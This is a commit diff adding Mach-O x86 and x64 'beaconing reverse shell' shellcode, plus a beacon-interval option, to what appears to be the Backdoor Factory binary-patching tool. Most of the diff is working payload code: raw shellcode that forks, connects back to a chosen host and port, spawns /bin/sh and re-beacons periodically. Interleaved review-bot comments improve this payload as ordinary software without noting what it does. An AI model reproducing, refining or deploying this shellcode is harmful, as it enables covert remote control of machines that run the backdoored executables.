Commit 13c191b6 authored by Mati's avatar Mati

Imported Upstream version 2.3.2

parent 3dce8cf1
......@@ -268,12 +268,17 @@ Sample Usage:
###Changelog
12/17/2014
OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp
-B 15 --> set beacon time for 15 secs
Bug fix to support OS X for BDFProxy
10/11/2014
PE UPX Patching Added
9/26/2014
Mach-O x86/x64 added
x86 IAT payload optimization
......
......@@ -53,6 +53,7 @@ from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
......@@ -61,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
2.3.1
2.3.2
"""
author = """\
......@@ -244,10 +245,13 @@ class bdfMain():
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--FAT_PRIORITY", dest="FAT_PRIORITY", default="x64", action="store",
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
(options, args) = parser.parse_args()
......@@ -328,7 +332,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
......@@ -425,7 +430,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
......@@ -523,7 +529,8 @@ class bdfMain():
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY
options.FAT_PRIORITY,
options.BEACON
)
else:
......
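Review bot: The new `-B`/`--beacon` option in the `add_option` hunk is typed `int` but never range-checked, and its help text omits the default; the value is later handed to `struct.pack("<I", ...)` in the shellcode classes, where a negative or oversized number fails with a bare `struct.error` instead of a usable CLI message. A guard right after `parse_args()`, `if not 0 <= options.BEACON <= 0xffffffff: parser.error("-B/--beacon must be between 0 and 4294967295")`, would report it at the command line, and the help could read `help="For payloads that have the ability to beacon out, set the time in secs (default: 15)"`. The same hunk renames the long option `--FAT_PRIORITY` to `--fat_priority`, which breaks existing invocations and is not mentioned in the changelog hunk above; optparse accepts several option strings per option, so `parser.add_option("-F", "--fat_priority", "--FAT_PRIORITY", dest="FAT_PRIORITY", default="x64", action="store", ...)` would keep the old spelling working. The enclosing method continues outside the hunk.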
......@@ -39,11 +39,12 @@ class macho_intel32_shellcode():
Mach-O Intel x32 shellcode class
"""
def __init__(self, HOST='127.0.0.1', PORT=8080, jumpLocation=0x0, SUPPLIED_SHELLCODE=None):
def __init__(self, HOST='127.0.0.1', PORT=8080, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
......@@ -57,6 +58,53 @@ class macho_intel32_shellcode():
def returnshellcode(self):
return self.shellcode
def beaconing_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x41\x00\x00\x00"
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
#Time Check
self.shellcode2 += "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
"\xe9\x8E\xff\xff\xff\xff" # jmp back to FORK
)
#FORK to main program
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
......
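Review bot: In the new `beaconing_reverse_shell_tcp`, the comment on the `"\x05"` opcode still reads `# add eax, 15 for seconds` although the following `struct.pack("<I", self.BEACON)` now emits the configured value, so it should say `# add eax, BEACON (seconds, from -B)`; the x64 counterpart in MachoIntel64 carries the same stale `# add rax, 15 for seconds` next to its `struct.pack("<I", self.BEACON)` line. Neither method validates `self.BEACON` before packing, so a negative, oversized or non-integer value (the constructor default is the only guard for direct callers) surfaces as a `struct.error` deep in payload generation rather than as a clear message; a check alongside the existing HOST/PORT guards, `if not 0 <= self.BEACON <= 0xffffffff:` followed by the same print-and-`return False` pattern, would match the method's error style. The method also lacks a docstring; one sentence noting that it assembles `self.shellcode1 + self.shellcode2`, stores the result in `self.shellcode` and also returns it (or `False` when HOST or PORT is missing) would spare the next reader a trace through the byte strings.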
......@@ -39,11 +39,12 @@ class macho_intel64_shellcode():
Mach-O Intel x64 shellcode Class
"""
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None):
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
......@@ -92,6 +93,59 @@ class macho_intel64_shellcode():
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x6c\x00\x00\x00"
#self.shellcode1 = "\xe9\x6c\x00\x00\x00"
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">h", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
#TIME CHECK
self.shellcode2 += "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
"\xe9\x60\xff\xff\xff\xff" # jmp back to FORK
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
......
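Review bot: The new `beaconing_reverse_shell_tcp` contains commented-out code that reads as a development leftover: `#self.shellcode1 = "\xe9\x6c\x00\x00\x00"` right after the `"\x6c\x00\x00\x00"` line, and `# \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset` appended to the `"\x0f\x84"` line, where the quoted bytes are not what the code emits since the displacement is computed from `jumpLocation` a few lines below. Drop the first line outright and trim the second comment to `# rel32 displacement is packed below from jumpLocation`, keeping the LC_MAIN note only if it is still accurate (the Mach-O constant is spelled `LC_UNIXTHREAD`). The stale `# add rax, 15 for seconds` comment in this hunk is covered by the note on the MachoIntel32 section.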
......@@ -42,7 +42,8 @@ from intel.MachoIntel32 import macho_intel32_shellcode
class machobin():
def __init__(self, FILE, OUTPUT=None, SHELL=None, HOST="127.0.0.1", PORT=8080,
SUPPORT_CHECK=False, SUPPLIED_SHELLCODE=None, FAT_PRIORITY="x64"
SUPPORT_CHECK=False, SUPPLIED_SHELLCODE=None, FAT_PRIORITY="x64",
BEACON=15
):
self.FILE = FILE
self.OUTPUT = OUTPUT
......@@ -58,6 +59,7 @@ class machobin():
self.SUPPORT_CHECK = SUPPORT_CHECK
self.FAT_FILE = False
self.FAT_PRIORITY = FAT_PRIORITY
self.BEACON = BEACON
self.supported_CPU_TYPES = [0x7, # i386
0x01000007 # x64
]
......@@ -87,16 +89,17 @@ class machobin():
def support_check(self):
print "[*] Checking file support"
check = self.get_structure()
if check is False:
self.supported = False
for key, value in self.load_cmds.iteritems():
self.ImpValues[key] = self.find_Needed_Items(value)
if self.ImpValues[key]['text_segment'] == {}:
print '[!] Not a proper Mach-O file'
with open(self.FILE, 'r+b') as self.bin:
check = self.get_structure()
if check is False:
self.supported = False
for key, value in self.load_cmds.iteritems():
self.ImpValues[key] = self.find_Needed_Items(value)
if self.ImpValues[key]['text_segment'] == {}:
print '[!] Not a proper Mach-O file'
self.supported = False
def output_options(self):
"""
Output file check.
......@@ -149,7 +152,7 @@ class machobin():
return False
#else:
# shell_cmd = self.SHELL + "()"
self.shells = self.bintype(self.HOST, self.PORT, self.jumpLocation, self.SUPPLIED_SHELLCODE)
self.shells = self.bintype(self.HOST, self.PORT, self.jumpLocation, self.SUPPLIED_SHELLCODE, self.BEACON)
self.allshells = getattr(self.shells, self.SHELL)()
self.shellcode = self.shells.returnshellcode()
return self.shellcode
......
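Review bot: In `support_check`, `with open(self.FILE, 'r+b') as self.bin:` binds the file object to an instance attribute that is closed the moment the block exits, so `self.bin` lingers as a closed handle afterwards; if any method outside this hunk reads `self.bin` later it will fail with "I/O operation on closed file", and if `get_structure`/`find_Needed_Items` are the only readers, a `self.bin = None` after the block (or a comment stating the handle is only valid inside `support_check`) would make the lifetime explicit. The check only reads the file as far as this hunk shows, so `open(self.FILE, 'rb')` is sufficient; `'r+b'` grants write access a support check does not need and leaves the input open to accidental modification. Separately, `self.supported` is set to `False` on both failure paths but never to `True` here; if it is not initialised elsewhere in the class, a `self.supported = True` before the loop is needed for the flag to mean anything.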